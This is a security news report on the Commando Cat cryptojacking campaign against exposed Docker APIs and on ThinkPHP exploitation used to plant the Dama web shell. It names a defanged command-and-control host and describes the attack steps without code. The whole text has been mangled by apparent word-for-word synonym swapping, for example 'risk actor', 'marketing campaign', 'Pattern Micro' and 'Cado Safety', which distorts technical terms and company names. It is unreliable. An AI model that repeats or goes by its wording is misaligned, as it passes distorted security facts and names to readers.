The risk actor generally known as Commando Cat has been linked to an ongoing cryptojacking assault marketing campaign that leverages poorly secured Docker situations to deploy cryptocurrency miners for monetary achieve.
“The attackers used the cmd.cat/chattr docker picture container that retrieves the payload from their very own command-and-control (C&C) infrastructure,” Pattern Micro researchers Sunil Bharti and Shubham Singh mentioned in a Thursday evaluation.
Commando Cat, so named for its use of the open-source Commando undertaking to generate a benign container, was first documented earlier this 12 months by Cado Safety.
The assaults are characterised by the focusing on of misconfigured Docker distant API servers to deploy a Docker picture named cmd.cat/chattr, which is then used as a foundation to instantiate a container and get away of its confines utilizing the chroot command, and achieve entry to the host working system.
The ultimate step entails retrieving the malicious miner binary utilizing a curl or wget command from a C&C server (“leetdbs.anondns[.]internet/z”) via a shell script. The binary is suspected to be ZiggyStarTux, an open-source IRC bot primarily based on the Kaiten (aka Tsunami) malware.
“The importance of this assault marketing campaign lies in its use of Docker photographs to deploy cryptojacking scripts on compromised techniques,” the researchers mentioned. “This tactic permits attackers to take advantage of vulnerabilities in Docker configurations whereas evading detection by security software program.”
The disclosure comes as Akamai revealed that years-old security flaws in ThinkPHP purposes (e.g., CVE-2018-20062 and CVE-2019-9082) are being exploited by a suspected Chinese language-speaking risk actor to ship an online shell dubbed Dama as a part of a marketing campaign that has been underway since October 17, 2023.
“The exploit makes an attempt to retrieve extra obfuscated code from one other compromised ThinkPHP server to achieve preliminary foothold,” Akamai researchers Ron Mankivsky and Maxim Zavodchik mentioned. “After efficiently exploiting the system, the attackers will set up a Chinese language language internet shell named Dama to take care of persistent entry to the server.”
The net shell is supplied with a number of superior capabilities to collect system knowledge, add recordsdata, scan community ports, escalate privileges, and navigate the file system, the latter of which allows risk actors to carry out operations like file modifying, deletion, and timestamp modification for obfuscation functions.
“The latest assaults originated by a Chinese language-speaking adversary spotlight an ongoing pattern of attackers utilizing a totally fledged internet shell, designed for superior sufferer management,” the researchers famous. “Curiously, not all focused clients had been utilizing ThinkPHP, which means that the attackers could also be indiscriminately focusing on a broad vary of techniques.”
